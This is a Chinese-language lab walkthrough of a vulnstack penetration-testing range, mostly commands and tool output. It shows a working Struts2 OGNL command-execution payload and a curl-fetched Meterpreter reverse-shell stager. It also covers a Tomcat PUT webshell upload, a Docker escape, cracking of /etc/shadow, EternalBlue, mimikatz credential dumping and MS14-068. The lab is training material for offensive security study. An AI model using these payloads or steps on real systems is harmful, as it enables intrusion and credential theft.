大连 网站,开发的网站,微信小程序官方教程,六安城市网怎么样靶机链接#xff1a;http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 环境搭建
新建两张仅主机网卡#xff0c;一张192.168.183.0网段#xff08;内网网卡#xff09;#xff0c;一张192.168.157.0网段#xff08;模拟外网网段#xff09;#xff0c;然后按照拓补… 靶机链接http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 环境搭建
新建两张仅主机网卡一张192.168.183.0网段内网网卡一张192.168.157.0网段模拟外网网段然后按照拓补图分配网卡即可 IP信息
Kali 192.158.157.129
Ubuntu-web 192.168.157.128 192.168.183.129
Win7 192.168.183.131
DC 192.168.183.130
然后在ubuntu启动Docker启动 sudo docker start ec 17 09 bb da 3d ab ad
主机探测端口扫描 扫描网段内存活主机 nmap -sP 192.168.157.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 12:44 CST
Nmap scan report for 192.168.157.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.157.128
Host is up (0.00024s latency).
MAC Address: 00:0C:29:B6:47:4A (VMware)
Nmap scan report for 192.168.157.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:E7:E8:3F (VMware)
Nmap scan report for 192.168.157.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.01 seconds靶机IP是128 kali 的IP是129 扫描靶机端口 nmap -sT -min-rate 10000 -p- 192.168.157.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 13:04 CST
Nmap scan report for 192.168.157.128
Host is up (0.00076s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
2001/tcp open dc
2002/tcp open globe
2003/tcp open finger
MAC Address: 00:0C:29:B6:47:4A (VMware)2001-2003是web端口 扫描主机服务版本以及系统版本 nmap -sV -sT -O -p 22,2001,2002,2003 192.168.157.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 13:28 CST
Nmap scan report for 192.168.157.128
Host is up (0.00075s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
2001/tcp open http Jetty 9.2.11.v20150529
2002/tcp open http Apache Tomcat 8.5.19
2003/tcp open http Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:B6:47:4A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerneJetty 9.2.11 以及Tomcat 和 httpd 扫描主机服务漏洞使用nikto扫描 nikto -host 192.168.157.128 -port 22,2001,2002,2003
- Nikto v2.5.0
---------------------------------------------------------------------------
--------------------------------------------------------------------------- Target IP: 192.168.157.128 Target Hostname: 192.168.157.128 Target Port: 2001 Start Time: 2024-12-02 13:51:23 (GMT8)
--------------------------------------------------------------------------- Server: Jetty(9.2.11.v20150529) /: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparke
r.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ No CGI Directories found (use -C all to force check all possible dirs) Jetty/9.2.11.v20150529 appears to be outdated (current is at least 11.0.6). Jetty 10.0.6 AND 9.4.41.v20210516 are also currently supported. /: Uncommon header nikto-added-cve-2017-5638 found, with contents: 42. /: Site appears vulnerable to the strutshock vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2017-5638/index.action: Site appears vulnerable to the strutshock vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2017-5638/login.action: Site appears vulnerable to the strutshock vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2017-5638 /getaccess: This may be an indication that the server is running getAccess for SSO. /siteminder: This may be an indication that the server is running Siteminder for SSO. /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site. ERROR: Error limit (20) reached for host, giving up. Last error: Scan terminated: 0 error(s) and 11 item(s) reported on remote host End Time: 2024-12-02 13:51:37 (GMT8) (14 seconds)
--------------------------------------------------------------------------- Target IP: 192.168.157.128 Target Hostname: 192.168.157.128 Target Port: 2002 Start Time: 2024-12-02 13:51:37 (GMT8)
--------------------------------------------------------------------------- Server: No banner retrieved /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparke
r.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/No CGI Directories found (use -C all to force check all possible dirs) /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon/nikto-test-7haKDeBL.html: HTTP method PUT allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled/favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon [0/122]/nikto-test-7haKDeBL.html: HTTP method PUT allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS . HTTP method (Allow Header): PUT method could allow clients to save files on the web server. HTTP method (Allow Header): DELETE may allow clients to remove files on the web server. /examples/servlets/index.html: Apache Tomcat default JSP pages present. /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2004-2104 /manager/manager-howto.html: Tomcat documentation found. See: CWE-552 /manager/html: Default Tomcat Manager / Host Manager interface found. /host-manager/html: Default Tomcat Manager / Host Manager interface found. /manager/status: Default Tomcat Server Status interface found. /host-manager/status: Default Tomcat Server Status interface found. 9610 requests: 0 error(s) and 14 item(s) reported on remote host End Time: 2024-12-02 13:52:21 (GMT8) (44 seconds)
--------------------------------------------------------------------------- Target IP: 192.168.157.128 Target Hostname: 192.168.157.128 Target Port: 2003 Start Time: 2024-12-02 13:52:21 (GMT8)
--------------------------------------------------------------------------- Server: Apache/2.4.25 (Debian) /: Retrieved x-powered-by header: PHP/7.2.5. /: Uncommon header x-ob_mode found, with contents: 1. /TrzGOLfn.show_query_columns: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ No CGI Directories found (use -C all to force check all possible dirs) Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. Multiple index files found: /index.php, /index.jsp. /: Web Server returns a valid response with junk HTTP methods which may cause false positives. /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?viewvs-2017 /README: README file found. /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/ /package.json: Node.js package file found. It may contain sensitive information. 17689 requests: 0 error(s) and 12 item(s) reported on remote host End Time: 2024-12-02 13:53:18 (GMT8) (57 seconds)
--------------------------------------------------------------------------- 3 host(s) tested 2001端口可能存在CVE-2017-5638 2002 端口允许put和delete方法可能存在CVE-2017-12615
web渗透
访问主页 2001端口 文件上传页面 2002端口 2003端口 竟然是phpmyadmin
CVE-2017-5638 https://www.cnblogs.com/moyudaxia/p/14445883.html 发现和靶机页面一模一样应该是使用直接Docker造的 验证漏洞 Content-Type: %{#context[com.opensymphony.xwork2.dispatcher.HttpServletResponse].addHeader(vulhub,233*233)}.multipart/form-data漏洞存在 EXP存在命令执行 Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdRCE).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}进行反弹shell msfvenom生成payload msfvenom -p cmd/linux/http/x64/meterpreter/reverse_tcp lhost192.168.157.129 lport1234 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 117 bytes
curl -so /tmp/irZWQXXBy http://192.168.157.129:8080/gYBZzJWIpFJeIY1gYugNpQ; chmod x /tmp/irZWQXXBy; /tmp/irZWQXXBy msf监听 msf6 use exploit/multi/handler
msf6 exploit(multi/handler) set payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set lhost 192.168.157.129
msf6 exploit(multi/handler) set lport 1234
msf6 exploit(multi/handler) run exp中填入生成的payload然后发送 Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdcurl -so /tmp/irZWQXXBy http://192.168.157.129:8080/gYBZzJWIpFJeIY1gYugNpQ; chmod x /tmp/irZWQXXBy; /tmp/irZWQXXBy ).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}获得shell msf6 exploit(multi/handler) run [*] Started reverse TCP handler on 192.168.157.129:1234
[*] Sending stage (3045380 bytes) to 192.168.157.128
[*] Meterpreter session 1 opened (192.168.157.129:1234 - 192.168.157.128:52614) at 2024-12-02 14:52:14 0800 meterpreter CVE-2017-12615
Tomcat PUT方法任意写文件漏洞利用HTTP的PUT方法直接上传webshell到目标服务器从而获取权限 抓包然后修改为PUT方法然后1.jsp是上传文件名内容块里边是冰蝎的JSP脚本内容 PUT /1.jsp/ HTTP/1.1
Host: 192.168.157.128:2002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.157.128:2001/
Sec-GPC: 1
Connection: keep-alive
Cookie: JSESSIONIDebkm5umq7o4emfo8amiifu8q; phpMyAdmin0e02d819225d61988d3e5e0979e5bf09; pma_langzh_CN
Upgrade-Insecure-Requests: 1
Priority: u0, i%page importjava.util.*,javax.crypto.*,javax.crypto.spec.*%%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%%if (request.getMethod().equals(POST)){String ke45e329feb5d925b;session.putValue(u,k);Cipher cCipher.getInstance(AES);c.init(2,new SecretKeySpec(k.getBytes(),AES));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%使用冰蝎连接成功连接获得shell 然后通过上边一样的方法反弹shell即可
信息收集 查看权限 # id
uid0(root) gid0(root) groups0(root)
# whoami
root
# uname -a
Linux 174745108fcb 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 GNU/Linux直接就是root权限 判断是否是Docker环境 meterpreter run post/linux/gather/checkcontainer [] This appears to be a Docker container似乎这是一个Docker容器再看根目录下是否存在.dockerenv文件 cd /
pwd
/
ls -al
total 72
drwxr-xr-x 1 root root 4096 Jan 22 2020 .
drwxr-xr-x 1 root root 4096 Jan 22 2020 ..
-rwxr-xr-x 1 root root 0 Jan 22 2020 .dockerenv由此可以判断是在容器内
Docker逃逸 https://xz.aliyun.com/t/8558?time__1311n4%2BxnD0DcDuD90WY4GNepDUh2YDOl9YD02L%2BiD#toc-3 想着尝试用dirty cow来逃逸Docker但是发现内核版本不在范围内只能寻找别的方法 然后尝试 利用特权模式进行逃逸 当操作者执行docker run --privileged时Docker将允许容器访问宿主机上的所有设备同时修改AppArmor或SELinux的配置使容器拥有与那些直接运行在宿主机上的进程几乎相同的访问权限。 使用fdisk -l查看磁盘无回显现在是2001端口获得的shell # fdisk -l使用tomcat获得的shell来查看磁盘可以查看到 # fdisk -l
Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Units: sectors of 1 * 512 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 16779263 16777216 8G 83 Linux
/dev/sda2 16781310 20969471 4188162 2G 5 Extended
/dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris判断特权模式 cat /proc/self/status | grep CapEff特权模式启动的话CapEff对应的掩码值应该为0000003fffffffff或者是 0000001fffffffff 创建目录并将分区挂载到目录中 mkdir test
mount /dev/sda1 /test然后已经将宿主机挂在到test目录下了 ls -al /test
total 120
drwxr-xr-x 23 root root 4096 Jan 20 2020 .
drwxr-xr-x 1 root root 4096 Dec 3 05:20 ..
drwxr-xr-x 2 root root 4096 Jan 20 2020 bin
drwxr-xr-x 3 root root 4096 Jan 20 2020 boot
drwxrwxr-x 2 root root 4096 Jan 20 2020 cdrom
drwxr-xr-x 4 root root 4096 Mar 4 2019 dev
drwxr-xr-x 130 root root 12288 Dec 3 04:57 etc
drwxr-xr-x 3 root root 4096 Jan 20 2020 home
lrwxrwxrwx 1 root root 33 Jan 20 2020 initrd.img - boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 23 root root 4096 Jan 20 2020 lib
drwxr-xr-x 2 root root 4096 Mar 4 2019 lib64
drwx------ 2 root root 16384 Jan 20 2020 lostfound
drwxr-xr-x 3 root root 4096 Mar 4 2019 media
drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
drwxr-xr-x 2 root root 4096 Jan 20 2020 opt
drwxr-xr-x 2 root root 4096 Apr 10 2014 proc
drwx------ 2 root root 4096 Jan 21 2020 root
drwxr-xr-x 12 root root 4096 Mar 4 2019 run
drwxr-xr-x 2 root root 12288 Jan 20 2020 sbin
drwxr-xr-x 2 root root 4096 Mar 4 2019 srv
drwxr-xr-x 2 root root 4096 Mar 13 2014 sys
drwxrwxrwt 5 root root 4096 Dec 3 05:17 tmp
drwxr-xr-x 10 root root 4096 Mar 4 2019 usr
drwxr-xr-x 13 root root 4096 Mar 4 2019 var
lrwxrwxrwx 1 root root 30 Jan 20 2020 vmlinuz - boot/vmlinuz-4.4.0-142-generic查看shadow文件仅能看到ubuntu用户有密码 cat /test/etc/shadow
ubuntu:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::拿到开膛手破解 john pass.txt
Warning: detected hash type md5crypt, but the string is also recognized as md5crypt-long
Use the --formatmd5crypt-long option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press q or Ctrl-C to abort, almost any other key for status
ubuntu (ubuntu)
1g 0:00:00:00 DONE 1/3 (2024-12-03 13:24) 33.33g/s 6400p/s 6400c/s 6400C/s ubuntu..ubuntut
Use the --show option to display all of the cracked passwords reliably
Session completed. 破解出密码 ubuntu 尝试登陆SSH ssh ubuntu192.168.157.128
ubuntu192.168.157.128s password:
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)* Documentation: https://help.ubuntu.com/Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Thu Jan 23 20:50:17 2020 from 192.168.157.128
ubuntuubuntu:~$ 成功进入查看IP信息等 ubuntuubuntu:~$ ip add
2: eth0: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:0c:29:b6:47:4a brd ff:ff:ff:ff:ff:ffinet 192.168.157.128/24 brd 192.168.157.255 scope global eth0valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:feb6:474a/64 scope link valid_lft forever preferred_lft forever
3: eth1: BROADCAST,MULTICAST,UP,LOWER_UP mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:b6:47:54 brd ff:ff:ff:ff:ff:ffinet 192.168.183.129/24 brd 192.168.183.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80::20c:29ff:feb6:4754/64 scope link valid_lft forever preferred_lft forever可以发现逃逸了docker环境并且内网网段是192.168.183.0
内网信息收集 查看ubuntu用户权限 ubuntuubuntu:~$ sudo -i
[sudo] password for ubuntu:
rootubuntu:~# 直接到root用户了成功拿到web主机的最高权限 将其上线MSF和上面的方法一样 msf6 exploit(multi/handler) run[*] Started reverse TCP handler on 192.168.157.129:4445
[*] Sending stage (3045380 bytes) to 192.168.157.128
[*] Meterpreter session 2 opened (192.168.157.129:4445 - 192.168.157.128:37052) at 2024-12-03 13:29:59 0800meterpreter 首先将设置通向内网的路由然后设置代理方便后面使用 添加路由 meterpreter run post/multi/manage/autoroute [*] Running module against 192.168.157.128
[*] Searching for subnets to autoroute.
[] Route added to subnet 172.17.0.0/255.255.0.0 from hosts routing table.
[] Route added to subnet 172.18.0.0/255.255.0.0 from hosts routing table.
[] Route added to subnet 172.19.0.0/255.255.0.0 from hosts routing table.
[] Route added to subnet 172.20.0.0/255.255.0.0 from hosts routing table.
[] Route added to subnet 192.168.157.0/255.255.255.0 from hosts routing table.
[] Route added to subnet 192.168.183.0/255.255.255.0 from hosts routing table.然后设置代理 meterpreter bg
[*] Backgrounding session 2
msf6 exploit(multi/handler) use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) set version 4a
msf6 auxiliary(server/socks_proxy) run
[*] Auxiliary module running as background job 0.然后配置chainproxy4的配置文件 # vim /etc/proxychains4.conf
socks4 127.0.0.1 1080 测试一下我们知道web主机内网地址是192.168.183.129 使用curl成功回显 proxychains curl 192.168.183.129:2001
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.183.129:2001 ... OK html
head titleStruts2 Showcase - Fileupload sample/title
/head 使用fscan扫描内网信息 将fscan 上传到ubuntu 靶机运行fscan将结果保存到1.txt ./fscan -h 192.168.183.1/24 1.txt扫描完毕后查看1.txt结果 存活主机除了web主机内网还有两台 (icmp) Target 192.168.183.129 is alive
(icmp) Target 192.168.183.130 is alive
(icmp) Target 192.168.183.131 is alive端口扫描 192.168.183.130:445 open
192.168.183.130:139 open
192.168.183.130:135 open
192.168.183.130:88 open 192.168.183.131:445 open
192.168.183.131:139 open
192.168.183.131:135 open 192.168.183.129:22 open 130开启了88端口是kerberos服务端口可能是域控并且都开启了445端口 vulscan [*] NetInfo
[*]192.168.183.131 [-]TESTWIN7-PC[-]192.168.183.131
[*] NetBios 192.168.183.1 WORKGROUP\DESKTOP-OO4DPSM
[*] NetInfo
[*]192.168.183.130 [-]WIN-ENS2VR5TR3N [-]192.168.183.130
[*] NetBios 192.168.183.130 [] DC:WIN-ENS2VR5TR3N.demo.com Windows Server 2008 HPC Edition 7601 Service Pack 1
[] MS17-010 192.168.183.131 (Windows 7 Enterprise 7601 Service Pack 1)
[] MS17-010 192.168.183.130 (Windows Server 2008 HPC Edition 7601 Service Pack 1)和上面猜测的一样130是DC域名是demo.com ,并且两台主机都扫描出了可能存在MS17-010
内网渗透
MS17-010
尝试MS17-010 TESTWIN7-PC 192.168.183.131 (概率低的令人发指)可能是代理问题 msf6 exploit(windows/smb/ms17_010_eternalblue) use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 192.168.183.131
msf6 exploit(windows/smb/ms17_010_eternalblue) set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) set AutoRunScript post/windows/manage/migrate
msf6 exploit(windows/smb/ms17_010_eternalblue) run[*] 192.168.183.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[] 192.168.183.131:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.183.131:445 - Scanned 1 of 1 hosts (100% complete)
[] 192.168.183.131:445 - The target is vulnerable.
[*] 192.168.183.131:445 - Connecting to target for exploitation.
[] 192.168.183.131:445 - Connection established for exploitation.
[] 192.168.183.131:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.183.131:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.183.131:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.183.131:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
[*] 192.168.183.131:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[] 192.168.183.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.183.131:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.183.131:445 - Sending all but last fragment of exploit packet
[*] 192.168.183.131:445 - Starting non-paged pool grooming
[] 192.168.183.131:445 - Sending SMBv2 buffers
[] 192.168.183.131:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.183.131:445 - Sending final SMBv2 buffers。
[*] 192.168.183.131:445 - Sending last fragment of exploit packet!
[*] 192.168.183.131:445 - Receiving response from exploit packet
[*] 192.168.183.131:445 - Sending last fragment of exploit packet!
[*] 192.168.183.131:445 - Receiving response from exploit packet
[] 192.168.183.131:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.183.131:445 - Sending egg to corrupted connection.
[*] 192.168.183.131:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 192.168.183.131:6756
[-] 192.168.183.131:445 - ------------------------------
[-] 192.168.183.131:445 - -------------FAIL---------------
[-] 192.168.183.131:445 - ------------------------------
[*] 192.168.183.131:445 - Connecting to target for exploitation.
[] 192.168.183.131:445 - Connection established for exploitation.
[] 192.168.183.131:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.183.131:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.183.131:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.183.131:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
[*] 192.168.183.131:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[] 192.168.183.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.183.131:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.183.131:445 - Sending all but last fragment of exploit packet
[*] 192.168.183.131:445 - Starting non-paged pool grooming
[] 192.168.183.131:445 - Sending SMBv2 buffers
[] 192.168.183.131:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.183.131:445 - Sending final SMBv2 buffers.
[*] 192.168.183.131:445 - Sending last fragment of exploit packet!
[*] 192.168.183.131:445 - Receiving response from exploit packet
[] 192.168.183.131:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.183.131:445 - Sending egg to corrupted connection.
[*] 192.168.183.131:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.183.131
[*] Session ID 3 (192.168.183.129:50614 - 192.168.183.131:6756 via session 1) processing AutoRunScript post/windows/manage/migrate
[*] Running module against TESTWIN7-PC
[*] Current server process: spoolsv.exe (1104)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 836
[] Successfully migrated into process 836
[] 192.168.183.131:445 - ------------------------------
[] 192.168.183.131:445 - -------------WIN----------------
[] 192.168.183.131:445 - ------------------------------
[*] Meterpreter session 3 opened (192.168.183.129:50614 - 192.168.183.131:6756 via session 1) at 2024-12-03 18:51:01 0800WIN-ENS2VR5TR3N 192.168.183.130 DC成功不了可能是考别的知识点
抓取密码 MSF加载mimikatz模块 meterpreter load kiwi
Loading extension kiwi....#####. mimikatz 2.2.0 20191125 (x64/windows).## ^ ##. A La Vie, A LAmour - (oe.eo)## / \ ## /*** Benjamin DELPY gentilkiwi ( benjamingentilkiwi.com )## \ / ## http://blog.gentilkiwi.com/mimikatz## v ## Vincent LE TOUX ( vincent.letouxgmail.com )##### http://pingcastle.com / http://mysmartlogon.com ***/Success.抓取密码 meterpreter creds_all
wdigest credentials
Username Domain Password
-------- ------ --------
(null) (null) (null)
TESTWIN7-PC$ DEMO /-LDA[1d hf-tfj)O)yNyCgh[o#D[h7I/*-ShnKX%X7wWWdrLDd!EUceLQ8:y!J?TD5KY*iuQ32i8He_D#JyWDWIzuYDDytr)\J7(_e(Fctsjl.ZdJRr
douser DEMO Dotest123抓取域用户douser的密码Dotest123
Win7开启RDP 查看权限 meterpreter getuid
Server username: NT AUTHORITY\SYSTEM开启RDP服务使用MSF模块 meterpreter run post/windows/manage/enable_rdp [*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20241203215408_default_192.168.183.131_host.windows.cle_035122.txt尝试登陆 proxychains rdesktop 192.168.183.131 -p Dotest123 -u douserDC上应该是有策略不允许该用户登录
寻找可利用点 在桌面下发现一些常用渗透工具MS14-068 可能是要使用该方法来攻略DC c:\Users\douser\Desktopdir
dirVolume in drive C has no label.Volume Serial Number is 605F-F555Directory of c:\Users\douser\Desktop2020/01/18 12:40 DIR .
2020/01/18 12:40 DIR ..
2020/01/11 15:06 2,189 360极速浏览器.lnk
2020/01/17 14:53 14,336 artifact.exe
2020/01/11 16:05 5,406 GetUserSPNs.ps1.ps1
2015/11/19 04:37 1,192,703 Invoke-DCSync.ps1
2020/01/11 16:37 47,937 Invoke-Kerberoast.ps1
2020/01/03 02:22 1,040,136 mimikatz.exe
2020/01/15 17:12 3,492,558 MS14-068.exe
2004/02/01 13:23 344,576 NetSess.exe
2020/01/15 15:39 374,944 PsExec64.exe
2020/01/16 22:13 53,248 PVEFindADUser.exe
2020/01/16 22:16 193 report.csv
2020/01/06 22:05 3,175 RProcdump.ps1
2020/01/17 15:52 2,897 systeiminfo_win7.txt
2020/01/16 11:30 1,074 TGT_douserdemo.com.ccacheMS14-068 获取用户SID 首先通过migrate到Douser的内存下 meterpreter ps2116 372 conhost.exe x64 1 DEMO\douser C:\Windows\system32\conhost.exe2720 464 taskhost.exe x64 1 DEMO\douser C:\Windows\system32\taskhost.exe2784 2852 explorer.exe x64 1 DEMO\douser C:\Windows\Explorer.EXE2888 840 dwm.exe x64 1 DEMO\douser C:\Windows\system32\Dwm.exe
meterpreter migrate 2784
[*] Migrating from 836 to 2784...
[*] Migration completed successfully.进入shell模式获取用户SID meterpreter shell
C:\Windows\system32whoami /all
SID demo\douser S-1-5-21-979886063-1111900045-1414766810-1107S-1-5-21-979886063-1111900045-1414766810-1107 利用桌面的ms14-068.exe提权工具生成伪造的kerberos协议认证证书 c:\Users\douser\DesktopMS14-068.exe -u douserdemo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
